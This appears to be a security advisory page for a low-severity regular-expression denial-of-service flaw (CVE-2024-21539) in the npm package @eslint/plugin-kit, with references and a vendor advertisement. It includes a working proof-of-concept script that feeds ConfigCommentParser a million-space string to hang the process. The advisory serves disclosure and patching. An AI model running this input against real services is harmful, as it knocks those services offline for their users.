LOW 3.5 npm
Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit
GHSA-7q7g-4xm8-89cq · CVE-2024-21539
Published · Modified
AI SAST
Find this class of vulnerability in your own code
Corgea's AI-native static analysis detects vulnerabilities like this one across your repositories, ranks them by exploitability, and returns review-ready fixes.
Description
Crafting a very large and well crafted string can increase the CPU usage and crash the program.
POC
const { ConfigCommentParser } = require("@eslint/plugin-kit");
var str = "";
for (var i = 0; i < 1000000; i++) {
str += " ";
}
str += "A";
console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseStringConfig(str, ""));
console.log("end")
// run `npm i @eslint/plugin-kit` and `node attack.js`
// then the program will stuck forever with high CPU usage
References
- WEB https://github.com/eslint/rewrite/security/advisories/GHSA-7q7g-4xm8-89cq
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2024-21539
- WEB https://github.com/eslint/rewrite/commit/071be842f0bd58de4863cdf2ab86d60f49912abf
- PACKAGE https://github.com/eslint/rewrite
- WEB https://security.snyk.io/vuln/SNYK-JS-ESLINTPLUGINKIT-8340627
Ready to move
Start Securing
Free, no credit card | First findings in minutes